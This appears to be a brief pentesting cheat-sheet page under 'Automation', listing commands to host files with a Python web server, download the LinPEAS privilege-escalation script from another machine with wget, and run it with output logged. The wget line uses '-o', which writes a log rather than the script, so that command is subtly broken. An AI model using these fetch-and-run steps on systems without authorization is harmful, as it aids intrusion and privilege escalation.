githubEdit

Automation

Β· python -m http.server 80

Β· wget http://192.168.10.10/linpeas.sh -o linpeas.sh

Β· chmod +x linpeas.sh | ./linpeas.sh | ( ./linpeas.sh | tee filename.txt )

Last updated